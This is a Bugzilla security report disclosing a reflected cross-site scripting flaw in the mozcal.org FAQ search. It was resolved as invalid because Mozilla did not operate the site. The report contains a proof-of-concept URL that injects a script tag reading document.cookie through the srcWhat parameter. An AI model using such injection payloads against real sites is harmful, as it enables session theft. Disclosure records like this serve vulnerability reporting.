XSS vulnerability on mozcal.org

RESOLVED INVALID

Status

mozilla.org
Miscellaneous
RESOLVED INVALID
14 years ago
12 years ago

People

(Reporter: Michael Krax, Assigned: Mostafa Hosseini)

Tracking

Details

(Reporter)

Description

14 years ago
User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Build Identifier: 

http://www.mozcal.org/faq/index.php?
p=search&srcText=faq&submit=Go&cat_id=2&srcWhat="><script>alert(document.cookie)
</script>

Tested with Internet Explorer 6 using WinXP SP2




Reproducible: Always
For the record, this site is neither owned nor operated by the Mozilla
Foundation...  There's no information on the site to indicate who does own it,
though, and the whois information is using one of those ID protection services.
 Hopefully someone on the Calendar team is familiar with it and will know who to
contact though.
Component: General → Miscellaneous
Product: Calendar → mozilla.org
Version: unspecified → other
Group: security → webtools-security
(Assignee)

Comment 2

14 years ago
I've contacted the contributor who provides mozcal.org and meanwhile I have
disabled the link to it.
->invalid
wasn't our site, and appears entirely down now
Group: webtools-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 12 years ago
Resolution: --- → INVALID
You need to log in before you can comment on or make changes to this bug.